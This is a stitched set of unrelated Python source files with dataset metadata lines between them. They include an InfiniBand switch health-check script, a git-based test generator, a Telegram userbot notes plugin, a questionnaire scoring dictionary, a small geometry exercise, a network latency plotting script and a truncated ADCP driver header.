<filename>check_ib_switch.py
import re
import sys
import argparse
import logging
import subprocess
import itertools
def parse_table_hex(lines):
info = {}
for line in lines:
m = re.match(r'(.*?)\s*\| (.*)', line)
info[str(m.group(1))] = int(m.group(2), 16)
return info
def parse_table_ascii(lines):
info = {}
for line in lines:
m = re.match(r'(.*?)(\[\d+\])?\s*\| (.*)', line)
field = str(m.group(1))
hex_v = bytearray.fromhex(m.group(3)[2:]).decode()
value = str(hex_v.replace(u'\x00', '').strip())
if m.group(2):
if field in info.keys():
info[field] = info[field] + value
else:
info[field] = value
else:
info[field] = value
return info
def mlxreg_ext_fans(lid, fan_id):
cmdargs = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid), '--reg_name',
'MFSM', '--get', '--indexes', 'tacho={}'.format(fan_id)]
stdout, stderr = subprocess.Popen(cmdargs,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
return parse_table_hex(stdout.decode("utf-8").splitlines()[4:-1])
def mlxreg_ext_temp(lid, sensor_id):
cmdargs = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid), '--reg_name',
'MTMP', '--get', '--indexes',
'sensor_index={}'.format(sensor_id)]
stdout, stderr = subprocess.Popen(cmdargs,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
return parse_table_hex(stdout.decode("utf-8").splitlines()[4:-1])
def mlxreg_ext_psu(lid):
cmdargs = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid), '--reg_name',
'MSPS', '--get']
stdout, stderr = subprocess.Popen(cmdargs,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
psus = {}
lines = stdout.decode("utf-8").splitlines()[4:-1]
for line in lines:
# PSU Watt with 0x8 prependded
m_watt = re.match(r'psu(\d)\[2\]\s+\| 0x8(.*)', line)
if m_watt:
psus['watt_' + m_watt.group(1)] = int(m_watt.group(2), 16)
return psus
def mlxreg_ext(lid, register):
cmdargs = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid), '--reg_name',
register, '--get']
stdout, stderr = subprocess.Popen(cmdargs,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
return parse_table_ascii(stdout.decode("utf-8").splitlines()[4:-1])
def ascii_field(name):
for field in ['vendor_name', 'vendor_sn', 'vendor_pn', 'vendor_rev']:
if field in name:
return True
return False
def mlxreg_ext_ports(lid, port_id):
index = 'local_port={},pnat=0x0,page_select=0x3,group_opcode=0x0'
cmdargs = ['mlxreg_ext', '-d', 'lid-{0}'.format(lid), '--reg_name',
'PDDR', '--get', '--indexes', index.format(port_id)]
stdout, stderr = subprocess.Popen(cmdargs,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
lines = stdout.decode("utf-8").splitlines()[4:-1]
info = parse_table_ascii(filter(ascii_field, lines))
info.update(parse_table_hex(itertools.filterfalse(ascii_field, lines)))
return info
def guid_to_lid():
stdout, stderr = subprocess.Popen(['ibswitches'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE).communicate()
lids = {} # store GUID to LID mapping
for line in stdout.decode("utf-8").splitlines():
logging.debug('guid_to_lid: %s', line)
m = re.match(r'.*(0x.*) ports.* lid (\d+)', line)
lids[m.group(1)] = int(m.group(2))
return lids
def print_info(info):
for item in info:
print(item)
parser = argparse.ArgumentParser(description='')
parser.add_argument("-v", "--verbose", action="store_true",
help="increase output verbosity")
parser.add_argument("--guid", help="Switch GUID to check",
action="store")
parser.add_argument("--node_name_map", help="Node name map file path",
action="store")
parser.add_argument("--name", help="Switch name used in node-name-map",
action="store")
parser.add_argument("--fan", help="Check fans", action="store_true")
parser.add_argument("--cable", help="Check cables", action="store_true")
parser.add_argument("--psu", help="Check PSUs", action="store_true")
parser.add_argument("--temp", help="Check temperatures", action="store_true")
args = parser.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
if args.name is False and args.guid is False:
print('Need to use the GUID or the switch name')
sys.exit(3)
if args.name:
if args.node_name_map is None:
print('node_name_map need to be defined')
sys.exit(3)
guid_name = {}
name_guid = {}
if args.node_name_map:
with open(args.node_name_map) as f:
for line in f:
m = re.match(r'(0x.*) "(.*)"', line)
if m:
guid_name[m.group(1)] = m.group(2)
name_guid[m.group(2)] = m.group(1)
guids = guid_to_lid()
if args.guid:
# received a GUID, check in node name map
guid = args.guid
if args.guid in guid_name:
name = guid_name[args.guid]
else:
name = args.guid
else:
# Received the name, need to get the GUID from the file
guid = name_guid[args.name]
name = args.name
lid = guids[guid]
perfdata = []
criticals = []
warnings = []
info = []
sw = mlxreg_ext(lid, 'MSGI')
info.append('GUID={} LID={} Name={}'.format(guid, lid, name))
info.append('{} PN={} Rev={} SN={}'.format(sw['product_name'],
sw['part_number'], sw['revision'], sw['serial_number']))
if args.psu:
psus = mlxreg_ext_psu(lid)
for i in range(2):
psu_watt = 'watt_{}'.format(i)
if psus[psu_watt] < 30:
criticals.append('PSU{} is down with {}W'.format(
i, psus[psu_watt]))
if psus[psu_watt] > 100:
warnings.append('PSU{} might be alone with {}W'.format(
i, psus[psu_watt]))
perfdata.append('PSU{psu}_W={watt};;30:100;;'.format(
psu=i,
watt=psus[psu_watt],
))
if args.fan:
for i in range(1, 9):
fan_info = mlxreg_ext_fans(lid, i)
rpm = fan_info['rpm']
if rpm < 4500:
criticals.append('Fan #{} is too slow, {} RPM'.format(i, rpm))
elif rpm > 13000:
criticals.append('Fan #{} is too fast, {} RPM'.format(i, rpm))
perfdata.append('Fan{fan}_RPM={speed};;{MIN_FAN}:{MAX_FAN};;'.format(
fan=i,
speed=rpm,
MIN_FAN=4500,
MAX_FAN=13000,
))
if args.temp:
for i in range(1, 7):
temp_info = mlxreg_ext_temp(lid, i)
temperature = temp_info['temperature']/10
if temperature > 45:
criticals.append('Temperature of #{} is too high, {}C'.format(
i, temperature))
perfdata.append('Temperature{sensor}_C={temp};;5:{MAX_TEMP};;'.format(
sensor=i,
temp=temperature,
MAX_TEMP=45,
))
if args.cable:
for i in range(1, 37):
cable = mlxreg_ext_ports(lid, i)
temperature = cable['temperature']/256
if temperature > 70:
criticals.append('Cable {} is overtemp at {}C > 70C'.format(
i, temperature))
info.append('Cable #{}, {} PN={} SN={} Rev={} FW={}, {}M'.format(
i,
cable['vendor_name'],
cable['vendor_pn'],
cable['vendor_sn'],
cable['vendor_rev'],
cable['fw_version'],
cable['cable_length'])
)
if len(criticals) > 1:
print('{criticals} | {perfdata}'.format(
criticals=', '.join(criticals) + ', '.join(warnings),
perfdata=' '.join(perfdata),
))
print_info(info)
sys.exit(2)
elif len(warnings) > 1:
print('{warnings} | {perfdata}'.format(
warnings=', '.join(warnings),
perfdata=' '.join(perfdata),
))
print_info(info)
sys.exit(1)
else:
print('Switch OK | {perfdata}'.format(
perfdata=' '.join(perfdata),
))
print_info(info)
sys.exit(0)
|
en
| 0.808937
|
# PSU Watt with 0x8 prependded # store GUID to LID mapping # received a GUID, check in node name map # Received the name, need to get the GUID from the file #{} is too slow, {} RPM'.format(i, rpm)) #{} is too fast, {} RPM'.format(i, rpm)) #{} is too high, {}C'.format( #{}, {} PN={} SN={} Rev={} FW={}, {}M'.format(
| 2.693975
| 3
|
versionizer/versionizer.py
|
Jordan-Gillard/Versionizer
| 0
|
6628487
|
import logging
import os
from typing import Optional, Set
from versionizer.ast_differ import ASTDiffer
from versionizer.ast_handler import ASTHandler
from versionizer.automated_test_executor import AutomatedTestExecutor
from versionizer.automated_test_generator import AutomatedTestGenerator
from versionizer.function_node import FunctionNode
from versionizer.git_handler import GitHandler
from versionizer.parsed_ast_builder import ParsedASTBuilder
class Versionizer:
def __init__(self, project_path: str,
first_commit: str,
output_path: Optional[str] = None,
second_commit: Optional[str] = None,
module: str = "",
algorithm="WHOLE_SUITE",
generate_tests=True,
run_tests=True):
self.project_path = project_path
self.module = module
if not output_path:
self.output_path = project_path
else:
self.output_path = output_path
self.first_commit = first_commit
self.second_commit = second_commit
self._validate_algorithm(algorithm)
self.algorithm = algorithm
self.generate_tests = generate_tests
self.run_tests = run_tests
self.test_generator = AutomatedTestGenerator(project_path, output_path,
algorithm, module)
self.git_handler = GitHandler(self.first_commit, self.second_commit)
@staticmethod
def _validate_algorithm(algorithm):
# TODO: Should algorithm validation be done in the AutomatedTestGenerator?
accepted_algorithms = ["RANDOM", "MOSA", "RANDOM_SEARCH", "WHOLE_SUITE"]
if algorithm not in accepted_algorithms:
raise ValueError(f"Algorithms must be one of {', '.join(algorithm)}.")
def run(self):
self.git_handler.stash_changes_if_necessary()
try:
# Handle working with a single file
if self.module:
self._run_for_file(self.project_path, self.module)
# Handle working with an entire directory
else:
for dirpath, dirnames, filenames in os.walk(self.project_path):
for file in filenames:
if file.endswith(
".py") and "test" not in file and "init" not in file:
self._run_for_file(self.project_path, file)
except Exception as e:
logging.error(e)
finally:
self.git_handler.return_to_head()
self.git_handler.pop_stash_if_needed()
if self.run_tests:
AutomatedTestExecutor.run_tests(self.project_path)
def _run_for_file(self, project_path, file):
self.git_handler.checkout_first_commit()
file_path_to_test = os.path.join(project_path, file)
ast_handler_1 = ASTHandler(file_path_to_test)
self.git_handler.checkout_second_commit()
ast_handler_2 = ASTHandler(file_path_to_test)
ast_differ = ASTDiffer(ast_handler_1, ast_handler_2)
different_nodes: Set[FunctionNode] = ast_differ.get_changed_function_nodes()
self.git_handler.checkout_first_commit()
parsed_ast_builder: ParsedASTBuilder = ParsedASTBuilder(file_path_to_test,
different_nodes,
ast_handler_1.get_function_dependents())
parsed_ast_builder.build_source()
if self.generate_tests:
self.test_generator.generate_tests()
test_file_name = "test_" + file
test_file_path = os.path.join(project_path, test_file_name)
with open(test_file_path, "r+") as f:
test_file_lines = f.readlines()
self.git_handler.return_to_head()
with open(test_file_path, "w") as f:
f.writelines(test_file_lines)
|
import logging
import os
from typing import Optional, Set
from versionizer.ast_differ import ASTDiffer
from versionizer.ast_handler import ASTHandler
from versionizer.automated_test_executor import AutomatedTestExecutor
from versionizer.automated_test_generator import AutomatedTestGenerator
from versionizer.function_node import FunctionNode
from versionizer.git_handler import GitHandler
from versionizer.parsed_ast_builder import ParsedASTBuilder
class Versionizer:
def __init__(self, project_path: str,
first_commit: str,
output_path: Optional[str] = None,
second_commit: Optional[str] = None,
module: str = "",
algorithm="WHOLE_SUITE",
generate_tests=True,
run_tests=True):
self.project_path = project_path
self.module = module
if not output_path:
self.output_path = project_path
else:
self.output_path = output_path
self.first_commit = first_commit
self.second_commit = second_commit
self._validate_algorithm(algorithm)
self.algorithm = algorithm
self.generate_tests = generate_tests
self.run_tests = run_tests
self.test_generator = AutomatedTestGenerator(project_path, output_path,
algorithm, module)
self.git_handler = GitHandler(self.first_commit, self.second_commit)
@staticmethod
def _validate_algorithm(algorithm):
# TODO: Should algorithm validation be done in the AutomatedTestGenerator?
accepted_algorithms = ["RANDOM", "MOSA", "RANDOM_SEARCH", "WHOLE_SUITE"]
if algorithm not in accepted_algorithms:
raise ValueError(f"Algorithms must be one of {', '.join(algorithm)}.")
def run(self):
self.git_handler.stash_changes_if_necessary()
try:
# Handle working with a single file
if self.module:
self._run_for_file(self.project_path, self.module)
# Handle working with an entire directory
else:
for dirpath, dirnames, filenames in os.walk(self.project_path):
for file in filenames:
if file.endswith(
".py") and "test" not in file and "init" not in file:
self._run_for_file(self.project_path, file)
except Exception as e:
logging.error(e)
finally:
self.git_handler.return_to_head()
self.git_handler.pop_stash_if_needed()
if self.run_tests:
AutomatedTestExecutor.run_tests(self.project_path)
def _run_for_file(self, project_path, file):
self.git_handler.checkout_first_commit()
file_path_to_test = os.path.join(project_path, file)
ast_handler_1 = ASTHandler(file_path_to_test)
self.git_handler.checkout_second_commit()
ast_handler_2 = ASTHandler(file_path_to_test)
ast_differ = ASTDiffer(ast_handler_1, ast_handler_2)
different_nodes: Set[FunctionNode] = ast_differ.get_changed_function_nodes()
self.git_handler.checkout_first_commit()
parsed_ast_builder: ParsedASTBuilder = ParsedASTBuilder(file_path_to_test,
different_nodes,
ast_handler_1.get_function_dependents())
parsed_ast_builder.build_source()
if self.generate_tests:
self.test_generator.generate_tests()
test_file_name = "test_" + file
test_file_path = os.path.join(project_path, test_file_name)
with open(test_file_path, "r+") as f:
test_file_lines = f.readlines()
self.git_handler.return_to_head()
with open(test_file_path, "w") as f:
f.writelines(test_file_lines)
|
en
| 0.835364
|
# TODO: Should algorithm validation be done in the AutomatedTestGenerator? # Handle working with a single file # Handle working with an entire directory
| 2.30396
| 2
|
userbot/plugins/notes.py
|
celovek123/SensibleUserbot
| 26
|
6628488
|
<reponame>celovek123/SensibleUserbot<filename>userbot/plugins/notes.py<gh_stars>10-100
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""notes
Available Commands:
.save
.listnotes
.clear"""
from telethon import events, utils
from telethon.tl import types
from userbot.plugins.sql_helper.notes_sql import get_notes, add_note, remove_note, get_all_notes
from userbot.utils import admin_cmd
TYPE_TEXT = 0
TYPE_PHOTO = 1
TYPE_DOCUMENT = 2
@borg.on(events.NewMessage(pattern=r'\#(\S+)', outgoing=True))
async def on_note(event):
name = event.pattern_match.group(1)
note = get_notes(name)
if note:
if note.note_type == TYPE_PHOTO:
media = types.InputPhoto(
int(note.media_id),
int(note.media_access_hash),
note.media_file_reference
)
elif note.note_type == TYPE_DOCUMENT:
media = types.InputDocument(
int(note.media_id),
int(note.media_access_hash),
note.media_file_reference
)
else:
media = None
message_id = event.message.id
if event.reply_to_msg_id:
message_id = event.reply_to_msg_id
await borg.send_message(
event.chat_id,
note.reply,
reply_to=message_id,
file=media
)
await event.delete()
@borg.on(admin_cmd("save (.*)"))
async def on_note_save(event):
name = event.pattern_match.group(1)
msg = await event.get_reply_message()
if msg:
note = {'type': TYPE_TEXT, 'text': msg.message or ''}
if msg.media:
media = None
if isinstance(msg.media, types.MessageMediaPhoto):
media = utils.get_input_photo(msg.media.photo)
note['type'] = TYPE_PHOTO
elif isinstance(msg.media, types.MessageMediaDocument):
media = utils.get_input_document(msg.media.document)
note['type'] = TYPE_DOCUMENT
if media:
note['id'] = media.id
note['hash'] = media.access_hash
note['fr'] = media.file_reference
add_note(name, note['text'], note['type'], note.get('id'), note.get('hash'), note.get('fr'))
await event.edit("note {name} saved successfully. Get it with #{name}".format(name=name))
else:
await event.edit("Reply to a message with `notes keyword` to save the note")
@borg.on(admin_cmd("listnotes"))
async def on_note_list(event):
all_notes = get_all_notes()
OUT_STR = "Available notes:\n"
if len(all_notes) > 0:
for a_note in all_notes:
OUT_STR += f"✔ #{a_note.note} \n"
else:
OUT_STR = "No notes. Start Saving using `.notes`"
if len(OUT_STR) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUT_STR)) as out_file:
out_file.name = "notes.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption="Available notes",
reply_to=event
)
await event.delete()
else:
await event.edit(OUT_STR)
@borg.on(admin_cmd("clear (\S+)"))
async def on_note_delete(event):
name = event.pattern_match.group(1)
remove_note(name)
await event.edit("note #{} deleted successfully".format(name))
|
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
"""notes
Available Commands:
.save
.listnotes
.clear"""
from telethon import events, utils
from telethon.tl import types
from userbot.plugins.sql_helper.notes_sql import get_notes, add_note, remove_note, get_all_notes
from userbot.utils import admin_cmd
TYPE_TEXT = 0
TYPE_PHOTO = 1
TYPE_DOCUMENT = 2
@borg.on(events.NewMessage(pattern=r'\#(\S+)', outgoing=True))
async def on_note(event):
name = event.pattern_match.group(1)
note = get_notes(name)
if note:
if note.note_type == TYPE_PHOTO:
media = types.InputPhoto(
int(note.media_id),
int(note.media_access_hash),
note.media_file_reference
)
elif note.note_type == TYPE_DOCUMENT:
media = types.InputDocument(
int(note.media_id),
int(note.media_access_hash),
note.media_file_reference
)
else:
media = None
message_id = event.message.id
if event.reply_to_msg_id:
message_id = event.reply_to_msg_id
await borg.send_message(
event.chat_id,
note.reply,
reply_to=message_id,
file=media
)
await event.delete()
@borg.on(admin_cmd("save (.*)"))
async def on_note_save(event):
name = event.pattern_match.group(1)
msg = await event.get_reply_message()
if msg:
note = {'type': TYPE_TEXT, 'text': msg.message or ''}
if msg.media:
media = None
if isinstance(msg.media, types.MessageMediaPhoto):
media = utils.get_input_photo(msg.media.photo)
note['type'] = TYPE_PHOTO
elif isinstance(msg.media, types.MessageMediaDocument):
media = utils.get_input_document(msg.media.document)
note['type'] = TYPE_DOCUMENT
if media:
note['id'] = media.id
note['hash'] = media.access_hash
note['fr'] = media.file_reference
add_note(name, note['text'], note['type'], note.get('id'), note.get('hash'), note.get('fr'))
await event.edit("note {name} saved successfully. Get it with #{name}".format(name=name))
else:
await event.edit("Reply to a message with `notes keyword` to save the note")
@borg.on(admin_cmd("listnotes"))
async def on_note_list(event):
all_notes = get_all_notes()
OUT_STR = "Available notes:\n"
if len(all_notes) > 0:
for a_note in all_notes:
OUT_STR += f"✔ #{a_note.note} \n"
else:
OUT_STR = "No notes. Start Saving using `.notes`"
if len(OUT_STR) > Config.MAX_MESSAGE_SIZE_LIMIT:
with io.BytesIO(str.encode(OUT_STR)) as out_file:
out_file.name = "notes.text"
await borg.send_file(
event.chat_id,
out_file,
force_document=True,
allow_cache=False,
caption="Available notes",
reply_to=event
)
await event.delete()
else:
await event.edit(OUT_STR)
@borg.on(admin_cmd("clear (\S+)"))
async def on_note_delete(event):
name = event.pattern_match.group(1)
remove_note(name)
await event.edit("note #{} deleted successfully".format(name))
|
en
| 0.725002
|
# This Source Code Form is subject to the terms of the Mozilla Public # License, v. 2.0. If a copy of the MPL was not distributed with this # file, You can obtain one at http://mozilla.org/MPL/2.0/. notes Available Commands: .save .listnotes .clear #(\S+)', outgoing=True)) #{name}".format(name=name)) #{a_note.note} \n" #{} deleted successfully".format(name))
| 2.158068
| 2
|
scoring/dictionary/IUS93.py
|
majazeh/risloo-samples
| 0
|
6628489
|
<reponame>majazeh/risloo-samples<gh_stars>0
f1 = 'factor_1'
f2 = 'factor_2'
option_numbers = 5
factors_names = ('raw',f1,f2)
factors = {
1: (f1,)
, 2: (f1,)
, 3: (f1,)
, 9: (f1,)
, 12: (f1,)
, 13: (f1,)
, 14: (f1,)
, 15: (f1,)
, 16: (f1,)
, 17: (f1,)
, 20: (f1,)
, 22: (f1,)
, 23: (f1,)
, 24: (f1,)
, 25: (f1,)
, 4: (f2,)
, 5: (f2,)
, 6: (f2,)
, 7: (f2,)
, 8: (f2,)
, 10: (f2,)
, 11: (f2,)
, 18: (f2,)
, 19: (f2,)
, 21: (f2,)
, 26: (f2,)
, 27: (f2,)
}
|
f1 = 'factor_1'
f2 = 'factor_2'
option_numbers = 5
factors_names = ('raw',f1,f2)
factors = {
1: (f1,)
, 2: (f1,)
, 3: (f1,)
, 9: (f1,)
, 12: (f1,)
, 13: (f1,)
, 14: (f1,)
, 15: (f1,)
, 16: (f1,)
, 17: (f1,)
, 20: (f1,)
, 22: (f1,)
, 23: (f1,)
, 24: (f1,)
, 25: (f1,)
, 4: (f2,)
, 5: (f2,)
, 6: (f2,)
, 7: (f2,)
, 8: (f2,)
, 10: (f2,)
, 11: (f2,)
, 18: (f2,)
, 19: (f2,)
, 21: (f2,)
, 26: (f2,)
, 27: (f2,)
}
|
none
| 1
| 1.736368
| 2
|
|
02_Utilizando_Modulos/17.py
|
TheCarvalho/Curso-Em-Video-Python
| 0
|
6628490
|
<gh_stars>0
# *ex 17 = Faça um programa que leia o comprimento do cateto oposto e do cateto adjacente de um triangulo retangulo. calculo e mostre o comprimento da hiputenusa
from math import hypot
opos = float(input('Me manda o cateto oposto: '))
adj = float(input('Agora me manda o adjacente: '))
print('A hipotenusa é {}'.format(hypot(opos, adj)))
|
# *ex 17 = Faça um programa que leia o comprimento do cateto oposto e do cateto adjacente de um triangulo retangulo. calculo e mostre o comprimento da hiputenusa
from math import hypot
opos = float(input('Me manda o cateto oposto: '))
adj = float(input('Agora me manda o adjacente: '))
print('A hipotenusa é {}'.format(hypot(opos, adj)))
|
pt
| 0.730475
|
# *ex 17 = Faça um programa que leia o comprimento do cateto oposto e do cateto adjacente de um triangulo retangulo. calculo e mostre o comprimento da hiputenusa
| 3.945441
| 4
|
lanyue_thesis/rate_limiter/raw_data/dctcp_benchmark/RTT_threshold/1000mbps/plot.py
|
keqhe/phd_thesis
| 2
|
6628491
|
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
from pylab import *
import matplotlib.gridspec as gridspec
#import matplotlib
matplotlib.rcParams['ps.useafm'] = True
matplotlib.rcParams['pdf.use14corefonts'] = True
matplotlib.rcParams['text.usetex'] = True
import re
import os
#====================param================================
FIGSIZE = (8, 4)
FIGNAME='figure.pdf'
TPUT_YLIM = (0, 1000)
LATE_YLIM = (0, 500)
MARKERS = ['o','v','^','s','*','+','x']
COLORS = ["k", "c", "g", "b", "m", "r", "y"]
PATTERNS = ['ko','cv','g^','bs','m*','r+','yx']
LINEPATTERNS = ['ko-','cv-','g^-','bs-','m*-','r+-','yx--']
#====================param================================
def ShowAndConfigParam():
mpl.rcParams['font.size']=14
mpl.rcParams['legend.fontsize']='small'
print "============ configurations ================="
print "default configuration file: %s" % mpl.matplotlib_fname()
print "default font size: %s" % mpl.rcParams['font.size']
print "legend fontsize: %s" % mpl.rcParams['legend.fontsize']
print "============ configurations ================="
def GetCDFData(fileName):
percentile_re_1 = re.compile(r"sockperf: ---> <(?P<max_or_min>.*)> observation =\s+(?P<value>\S+)")
percentile_re_2 = re.compile(r"sockperf: ---> percentile (?P<percent>.*) =\s+(?P<value>\S+)")
sample_re = re.compile(r"(?P<snd>\d+.\d*), (?P<rcv>\d+.\d*)")
percentiles = []
samples = []
f = open(fileName, 'r')
for line in f.readlines():
match = percentile_re_1.match(line)
if match!= None:
percentiles.append( ( float(match.group("value")), match.group("max_or_min") ) )
continue
match = percentile_re_2.match(line)
if match!=None:
percentiles.append( ( float(match.group("value")), match.group("percent") ) )
continue
match = sample_re.match(line)
if match != None:
latency = float(match.group("rcv")) - float(match.group("snd"))
samples.append(latency*1000000)
f.close()
percentiles = {p[1]:(p[0]*2) for p in percentiles}
samples.sort()
samples = (samples, [float(i)/len(samples) for i in range(len(samples))])
return percentiles
#return (percentiles, samples)
def GetTputData(fileName): # total
Mbits_re = re.compile(r".*\s+(?P<t1>\S+)-\s*(?P<t2>\S+)\s+sec.*\s+(?P<value>\S+)\s*Mbits/sec")
Gbits_re = re.compile(r".*\s+(?P<t1>\S+)-\s*(?P<t2>\S+)\s+sec.*\s+(?P<value>\S+)\s*Gbits/sec")
tput = []
f = open(fileName, 'r')
for line in f.readlines():
# print line
match = Mbits_re.match(line)
if match!=None:
t1 = float(match.group("t1"))
t2 = float(match.group("t2"))
if t2-t1!=1:
return float(match.group("value"))
match = Gbits_re.match(line)
if match!=None:
# print 'match Gbits'
t1 = float(match.group("t1"))
t2 = float(match.group("t2"))
if t2-t1!=1:
return float(match.group("value"))*1000
def GetThresholds():
thresholds=[]
for f in os.listdir('.'):
if f.startswith('iperf'):
thresholds.append( int(f[5:].split('.')[0]) )
return sorted(thresholds)
def Plot():
thresholds = GetThresholds() #range(0, 30001, 1000)
xs = [ t/1000 for t in thresholds]
lines =[ [], [], [], [], [], [], []]
legends = [ 'MIN', '0.25', '0.5', '0.75', '0.99', '0.999', 'tput' ]
for t in thresholds:
sockfile = 'sockperf%d.log' % t
percentiles = GetCDFData(sockfile)
lines[0].append(percentiles['MIN'])
lines[1].append(percentiles['25.000'])
lines[2].append(percentiles['50.000'])
lines[3].append(percentiles['75.000'])
lines[4].append(percentiles['99.000'])
lines[5].append(percentiles['99.900'])
iperffile = 'iperf%d.log' % t
tput = GetTputData(iperffile)
lines[6].append(tput)
figName=FIGNAME
fig, ax = plt.subplots(figsize=FIGSIZE)
patterns=[]
for i in range(6):
p, = ax.plot(xs, lines[i], LINEPATTERNS[i], label=legends[i])
patterns.append(p)
ax2 = ax.twinx()
p, = ax2.plot(xs, lines[6], LINEPATTERNS[6], label=legends[6])
patterns.append(p)
ax.set_ylabel('RTT (us)')
ax2.set_ylabel('Throughput (Mbps)')
ax2.set_ylim(TPUT_YLIM)
ax.set_xlabel('Threshold (kB)')
ax.set_ylim(LATE_YLIM)
ax.yaxis.grid(True, linestyle='--')
plt.legend(patterns, [l.get_label() for l in patterns], ncol=1, loc='upper left', framealpha=1)
plt.tight_layout(rect=(0, 0, 1, 1))
pp = PdfPages(figName)
pp.savefig()
pp.close()
if __name__ == '__main__':
Plot()
|
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib.backends.backend_pdf import PdfPages
from pylab import *
import matplotlib.gridspec as gridspec
#import matplotlib
matplotlib.rcParams['ps.useafm'] = True
matplotlib.rcParams['pdf.use14corefonts'] = True
matplotlib.rcParams['text.usetex'] = True
import re
import os
#====================param================================
FIGSIZE = (8, 4)
FIGNAME='figure.pdf'
TPUT_YLIM = (0, 1000)
LATE_YLIM = (0, 500)
MARKERS = ['o','v','^','s','*','+','x']
COLORS = ["k", "c", "g", "b", "m", "r", "y"]
PATTERNS = ['ko','cv','g^','bs','m*','r+','yx']
LINEPATTERNS = ['ko-','cv-','g^-','bs-','m*-','r+-','yx--']
#====================param================================
def ShowAndConfigParam():
mpl.rcParams['font.size']=14
mpl.rcParams['legend.fontsize']='small'
print "============ configurations ================="
print "default configuration file: %s" % mpl.matplotlib_fname()
print "default font size: %s" % mpl.rcParams['font.size']
print "legend fontsize: %s" % mpl.rcParams['legend.fontsize']
print "============ configurations ================="
def GetCDFData(fileName):
percentile_re_1 = re.compile(r"sockperf: ---> <(?P<max_or_min>.*)> observation =\s+(?P<value>\S+)")
percentile_re_2 = re.compile(r"sockperf: ---> percentile (?P<percent>.*) =\s+(?P<value>\S+)")
sample_re = re.compile(r"(?P<snd>\d+.\d*), (?P<rcv>\d+.\d*)")
percentiles = []
samples = []
f = open(fileName, 'r')
for line in f.readlines():
match = percentile_re_1.match(line)
if match!= None:
percentiles.append( ( float(match.group("value")), match.group("max_or_min") ) )
continue
match = percentile_re_2.match(line)
if match!=None:
percentiles.append( ( float(match.group("value")), match.group("percent") ) )
continue
match = sample_re.match(line)
if match != None:
latency = float(match.group("rcv")) - float(match.group("snd"))
samples.append(latency*1000000)
f.close()
percentiles = {p[1]:(p[0]*2) for p in percentiles}
samples.sort()
samples = (samples, [float(i)/len(samples) for i in range(len(samples))])
return percentiles
#return (percentiles, samples)
def GetTputData(fileName): # total
Mbits_re = re.compile(r".*\s+(?P<t1>\S+)-\s*(?P<t2>\S+)\s+sec.*\s+(?P<value>\S+)\s*Mbits/sec")
Gbits_re = re.compile(r".*\s+(?P<t1>\S+)-\s*(?P<t2>\S+)\s+sec.*\s+(?P<value>\S+)\s*Gbits/sec")
tput = []
f = open(fileName, 'r')
for line in f.readlines():
# print line
match = Mbits_re.match(line)
if match!=None:
t1 = float(match.group("t1"))
t2 = float(match.group("t2"))
if t2-t1!=1:
return float(match.group("value"))
match = Gbits_re.match(line)
if match!=None:
# print 'match Gbits'
t1 = float(match.group("t1"))
t2 = float(match.group("t2"))
if t2-t1!=1:
return float(match.group("value"))*1000
def GetThresholds():
thresholds=[]
for f in os.listdir('.'):
if f.startswith('iperf'):
thresholds.append( int(f[5:].split('.')[0]) )
return sorted(thresholds)
def Plot():
thresholds = GetThresholds() #range(0, 30001, 1000)
xs = [ t/1000 for t in thresholds]
lines =[ [], [], [], [], [], [], []]
legends = [ 'MIN', '0.25', '0.5', '0.75', '0.99', '0.999', 'tput' ]
for t in thresholds:
sockfile = 'sockperf%d.log' % t
percentiles = GetCDFData(sockfile)
lines[0].append(percentiles['MIN'])
lines[1].append(percentiles['25.000'])
lines[2].append(percentiles['50.000'])
lines[3].append(percentiles['75.000'])
lines[4].append(percentiles['99.000'])
lines[5].append(percentiles['99.900'])
iperffile = 'iperf%d.log' % t
tput = GetTputData(iperffile)
lines[6].append(tput)
figName=FIGNAME
fig, ax = plt.subplots(figsize=FIGSIZE)
patterns=[]
for i in range(6):
p, = ax.plot(xs, lines[i], LINEPATTERNS[i], label=legends[i])
patterns.append(p)
ax2 = ax.twinx()
p, = ax2.plot(xs, lines[6], LINEPATTERNS[6], label=legends[6])
patterns.append(p)
ax.set_ylabel('RTT (us)')
ax2.set_ylabel('Throughput (Mbps)')
ax2.set_ylim(TPUT_YLIM)
ax.set_xlabel('Threshold (kB)')
ax.set_ylim(LATE_YLIM)
ax.yaxis.grid(True, linestyle='--')
plt.legend(patterns, [l.get_label() for l in patterns], ncol=1, loc='upper left', framealpha=1)
plt.tight_layout(rect=(0, 0, 1, 1))
pp = PdfPages(figName)
pp.savefig()
pp.close()
if __name__ == '__main__':
Plot()
|
fr
| 0.294494
|
#import matplotlib #====================param================================ #====================param================================ #return (percentiles, samples) # total # print line # print 'match Gbits' #range(0, 30001, 1000)
| 2.36784
| 2
|
mi/instrument/teledyne/workhorse/vadcp/driver.py
|
cdobs/mi-instrument
| 1
|
6628492
|
<reponame>cdobs/mi-instrument
import copy
import functools
import json
import time
import re
from contextlib import contextmanager
import mi.instrument.teledyne.workhorse.particles as particles
from mi.core.log import get_logger
from mi.instrument.teledyne.workhorse.pd0_parser import AdcpPd0Record
from mi.core.instrument.chunker import StringChunker
from mi.core.instrument.instrument_protocol import RE_PATTERN, DEFAULT_CMD_TIMEOUT, DEFAULT_WRITE_DELAY
from mi.core.instrument.protocol_param_dict import ParameterDictVisibility, ProtocolParameterDict
